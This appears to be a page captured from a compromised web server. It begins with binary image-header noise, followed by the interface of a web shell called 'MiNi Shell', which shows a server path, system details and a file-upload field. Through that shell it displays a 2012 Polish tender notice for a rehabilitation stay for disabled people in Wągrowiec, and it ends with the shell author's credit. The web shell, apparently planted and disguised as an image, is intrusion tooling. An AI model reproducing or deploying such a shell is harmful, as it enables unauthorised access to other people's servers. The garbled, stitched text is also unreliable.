JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/311680-N-2012.html

<p class="kh_header"><b>Wągrowiec: Turnus 14 dniowy rehabilitacyjny, usprawniająco - rekreacyjny dla osób niepełnosprawnych - beneficjentów projektu systemowego pn. Rozwój                                       i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym</b><br>
<b>Numer ogłoszenia: 311680 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Wierzbowa 1, 62-100 Wągrowiec, woj. wielkopolskie, tel. 67 26 27 614, faks 67 26 27 614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wagrowiec.pl    www.pcpr.wagrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Turnus 14 dniowy rehabilitacyjny, usprawniająco - rekreacyjny dla osób niepełnosprawnych - beneficjentów projektu systemowego pn. Rozwój                                       i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Zorganizowanie i przeprowadzenie 14 dniowego  turnusu rehabilitacyjnego 
usprawniająco - rekreacyjnego dla osób niepełnosprawnych w ramach projektu                            pn. Rozwój i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych  i pomoc osobom usamodzielnianym. Usługa polega na zorganizowaniu i przeprowadzeniu  14 dniowego  turnusu  rehabilitacyjnego dla osób niepełnosprawnych, uczestników projektu p.n.  Rozwój i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych  i pomoc osobom usamodzielnianym współfinansowanego przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego. Usługa w szczególności obejmuje: zakwaterowanie, wyżywienie, rehabilitację, zapewnienie warunków do aktywnej realizacji czasu wolnego. 
Wymagania szczegółowe dotyczące Ośrodka:  
1) Ośrodek przyjmujący osoby niepełnosprawne na turnus rehabilitacyjny  musi posiadać
aktualny wpis do rejestru ośrodków, o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych  (Dz. U. z dnia 11 grudnia 2007r.)
2) Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym usprawniająco - rekreacyjnym, w którym będą uczestniczyć osoby z następującymi dysfunkcjami lub schorzeniami:   
a)z upośledzeniem umysłowym, 
b)z chorobą psychiczną, 
c)z zaburzeniami głosu i mowy, 
d)z dysfunkcją narządu słuchu, 
e)z dysfunkcją narządu wzroku, 
f)z dysfunkcją narządu ruchu, poruszających się na wózkach inwalidzkich, 
g)z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach    inwalidzkich, 
h)z epilepsją (padaczką), 
i)ze schorzeniami układu oddechowego, 
j)ze schorzeniami układu krążenia, 
k)z chorobami układu pokarmowego, 
l)z chorobami układu moczowo-płciowego, 
ł)ze schorzeniami kręgosłupa, 
m)z chorobami neurologicznymi, 
n)ze schorzeniami endokrynologicznymi, 
o)ze schorzeniami metabolicznymi, 
p)z chorobami układu krwiotwórczego, 
r)z cukrzycą. 
3) Każdy pokój w ośrodku winien posiadać pełny węzeł sanitarny (umywalkę, prysznic lub wannę, wc). 
4) Każdy pokój winien być wyposażony w TV i oddzielne łóżka. 
5) Na terenie ośrodka winna znajdować się baza zabiegowa, minimum gabinet fizykoterapii, hydroterapii, laseroterapii. 
6) Minimum jeden pokój 2 osobowy winien być dostosowany dla osób  niepełnosprawnych  poruszających się na wózkach inwalidzkich. 
7) Ośrodek na swoim terenie winien posiadać stołówkę. 
8) Na terenie ośrodka winno znajdować się miejsce do zorganizowania zajęć sportowo -  rekreacyjnych.  
9) Ośrodek winien posiadać na terenie swojego ośrodka salę fitness lub siłownię oraz miejsce do zajęć sportowych do wykorzystania przez uczestników wyjazdu w ramach pobytu. 
10) Ośrodek winien posiadać na swoim terenie basen kryty lub basen zewnętrzny  
z podgrzewaną wodą, dostępny dla uczestników wyjazdu. 
11) Przy ośrodku winno znajdować się wyznaczone miejsce do zorganizowania ogniska, posiadające miejsce do siedzenia dla każdego uczestnika wyjazdu. 
12) Ośrodek winien zapewnić uczestnikom w trakcie pobytu opiekę lekarską i pielęgniarską  oraz opiekę ratownika na basenie. 
13) Ośrodek winien zapewnić obsługę sprzątająco - porządkową dla utrzymania czystości  w pokojach i węzłach sanitarnych oraz innych pomieszczeniach, z których będą korzystać uczestnicy. 
14) Ośrodek winien być dostosowany do osób niepełnosprawnych, w tym do osób 
poruszających się na wózkach inwalidzkich. 
15) Ośrodek winien znajdować się na terenie Polski w odległości od miasta Wągrowca  nie większej niż 200 km. 
Dojazd: 
Wykonawca zapewni bezpieczny dojazd oraz powrót na turnus dla osób niepełnosprawnych wraz z ich opiekunami oraz ich bagażu, dla następującej liczby uczestników turnusu:   
45 osób w tym:
30 osób niepełnosprawnych,  
15 opiekunów osób niepełnosprawnych. 
Przejazd nastąpi z  Wągrowca (parking przy Powiatowym Centrum Pomocy Rodzinie                 ul. Wierzbowa 1, w godzinach wskazanych przez Zamawiającego do miejsca  realizacji turnusu. Powrót w dniu zakończenia turnusu, z miejsca pobytu do Wągrowca (parking przy Powiatowym Centrum Pomocy Rodzinie ul. Wierzbowa 1), po spożyciu obiadu  i wykwaterowaniu.  Tabor autobusowy winien być sprawny technicznie, z klimatyzacją, posiadać ubezpieczenie OC, NNW oraz aktualne badania techniczne.  
Taksa klimatyczna: 
Wykonawca opłaci taksę klimatyczną za wszystkich uczestników turnusu, jeśli wymagać będzie tego lokalizacja ośrodka w miejscowości uzdrowiskowej. 
Wymogi co do wyżywienia: 
Całodzienne wyżywienie ( śniadanie, obiad dwudaniowy plus deser, podwieczorek, kolacja).  
Wymogi co do noclegu: 
Nocleg w pokojach 2-osobowych z odrębnymi łóżkami. Pokoje typu komfort z łazienką  i WC.  Minimum jeden  pokój 2 osobowy winien być dostosowany dla osób niepełnosprawnych poruszających się na wózkach inwalidzkich.
Atrakcje dodatkowe: 
Organizator powinien zorganizować uczestnikom na terenie ośrodka minimum jeden wieczór grillowy, z co najmniej jednym daniem gorącym i gorącymi napojami. 
Organizator zapewni łączny czas zorganizowanych zajęć indywidualnych i grupowych  w wymiarze nie mniejszym niż cztery godziny dziennie. 
Organizator zapewni zajęcia specjalistyczne związane z rodzajem turnusu i uwzględnieniem rodzaju niepełnosprawności osób biorących w nim udział. 
Organizator zapewni: 
a)minimum trzy wieczorki taneczne  w okresie pobytu na turnusie,
b)dwa seanse kinowe,
c)co najmniej jedną wycieczkę w najbliższej okolicy atrakcyjnej turystycznie. 
Do dyspozycji uczestników turnusu należy udostępnić nieodpłatnie: 
1) salę szkoleniową wyposażoną w sprzęt multimedialny, dostępną od poniedziałku do piątku w godz. od 15.00 do 21.00 oraz w weekendy w godz. od 10.00 do 19.00,
2) basen,
3) miejsce do prowadzenia zajęć sportowych,
4) salę fitness, siłownię. 
Zamawiający w trosce o należyte wykonanie zamówienia, zastrzega sobie prawo do  wizji lokalnej przebiegającego turnusu. 
Uczestnicy turnusu:  
Uczestnikami turnusu będzie 45 osób w tym:   
30 osób niepełnosprawnych, w tym 2 na wózkach inwalidzkich.  
15 opiekunów osób niepełnosprawnych. 
Liczba uczestników i opiekunów może ulec zmianie. 
Wykonawca jest zobowiązany do pełnienia roli opiekuna grupy podczas wyjazdu                     i wspierania osób przez cały okres pobytu. 
Ubezpieczenie uczestników: 
Wykonawca pokryje koszty ubezpieczenia uczestników  turnusów od pierwszego do 
ostatniego dnia pobytu, na kwotę nie mniejszą niż 10 tyś. zł na każdą osobę biorącą udział   w turnusie. Polisa zostanie dostarczona Zamawiającemu najpóźniej w dniu wyjazdu. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego z uczestnictwem w turnusie jak  i w drodze do  i z miejsca turnusu.  
Obowiązki i czynności związane z realizacją turnusu rehabilitacyjnego: 
1)Wykonawca niezwłocznie zawiadomi o każdym przypadku przerwania turnusu  rehabilitacyjnego przez jego uczestnika,
2)Wykonawca przeprowadzi badanie lekarskie zakończone wskazaniem zabiegów 
leczniczych,
3)Wykonawca zapewni przeprowadzenie minimum dwóch zabiegów rehabilitacyjnych 
dziennie dla jednej osoby niepełnosprawnej będącej uczestnikiem turnusu, wg zaleceń   lekarza ośrodka. 
4)Wykonawca wystawi na Zamawiającego w terminie do 30 dni po zakończeniu turnusu  rehabilitacyjnego dwie odrębne faktury na każdego uczestnika zawierające oprócz  pełnych danych uczestnika: 
a. kwotę dofinansowaną ze środków PFRON (faktura 1) 
b.kwotę płatną ze  środków Unii Europejskiej w ramach Europejskiego Funduszu 
Społecznego (stanowiące różnicę pomiędzy wynagrodzeniem ofertowym za  
1 uczestnika,opiekuna turnusu, a kwotą dofinansowania uczestnictwa w turnusie  
 ze środków PFRON (faktura 2) 
5)Przesłanie Zamawiającemu w terminie do 30 dni od zakończenia turnusu faktur  
Karty informacyjnej o przebiegu turnusu rehabilitacyjnego, dokumentacji fotograficznej z przebiegu turnusu na płycie CD.
6)Wykonawca uzyska po przebytym turnusie u każdej osoby niepełnosprawnej będącej  uczestnikiem turnusu efekt (rezultat) podwyższenia poziomu funkcjonowania jej w  życiu codziennym i integracji. Informację taką należy zawrzeć w Karcie informacyjnej  o przebiegu turnusu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 55.27.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie aktualnego wpisu do następujących rejestrów: 
Rejestru organizatorów turnusów rehabilitacyjnych, w których uczestniczą osoby niepełnosprawne korzystające z dofinansowania ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych oraz Rejestru ośrodków, w których mogą odbywać się turnusy rehabilitacyjne dla osób niepełnosprawnych korzystających z dofinansowania Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia, nie spełnia, w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie co najmniej dwóch usług o tożsamej tematyce o wartości nie mniejszej niż 50 tyś.zł brutto. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia, nie spełnia, w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie aktualnego opłaconego w całości ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 100 tysięcy zł. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia, nie spełnia, w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, wypełniony i podpisany przez Wykonawcę, 2. Oświadczenie potwierdzające zgodność wymagań szczegółowych wobec Ośrodka, jakich spełnienia oczekuje Zamawiający. 3. Dotyczy podmiotów gospodarczych będących osobami fizycznymi: w celu stwierdzenia, czy osoba podpisująca oświadczenie woli lub udzielająca pełnomocnictwo posiada uprawnienia do tego uprawnienia, do oferty należy załączyć dokument, z którego wynika ww upoważnienie. 4. Pełnomocnictwo zgodne z obowiązującymi przepisami prawa, wystawione dla osoby (osób) upoważnionych do reprezentowania oferenta w toku postępowania o udzielenie zamówienia publicznego, o ile nie wynika ono z przedstawionych dokumentów - oryginał lub kopia potwierdzona notarialnie za zgodność z oryginałem</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. w przypadku, jeżeli zmiana umowy będzie korzystna dla Zamawiającego, 2. w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania, a które są niezbędne dla prawidłowej realizacji zamówienia, np. zmiana przepisów prawa dotyczących przedmiotu zamówienia. 3) Wszelkie zmiany do umowy wymagają zgody obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wagrowiec.pl   i www.pcpr.wagrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2012 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Wągrowcu
ul. Wierzbowa 1, 62-100 Wągrowiec, 
sekretariat pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia realizowany w ramach projektu systemowego pn Rozwój i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym -współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1  Poddziałanie 7.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com